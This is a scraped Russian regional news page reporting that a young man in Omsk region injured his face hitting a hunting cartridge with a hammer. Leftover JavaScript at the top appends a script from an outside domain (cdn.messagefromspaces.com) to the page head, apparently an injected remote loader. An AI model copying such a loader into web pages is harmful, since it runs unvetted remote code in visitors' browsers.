, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Сегодня: 23 июля, 2018 года
19 ноября, 2013 События

В Омской области молодой человек получил травму лица играя с патроном

Молодой человек бил по боеприпасу молотком. В итоге его увезли в больницу.

Баловство с боеприпасом обернулось для 18-летнего жителя Крутинского района серьезным увечьем. 17 ноября, около 20:00 он был доставлен из своего села Рыжкова в районную больницу с диагнозом «рваная рана переносицы».

Как оказалось, парень нашел на свалке охотничий патрон без взрывателя. Он принес его домой, а дома решил проверить боеприпас на прочность. Молодой человек ударил по патрону молотком, гильза, ожидаемо, отлетела ему в лицо. За помощью парень бросился к своей матери, которая в свою очередь доставила сына в больницу.

В настоящее время пострадавший находится под наблюдением врачей, его жизни и здоровью ничего не угрожает.

 

 

Перейти к комментариям [ 0 ]

Свежие статьи из категории: События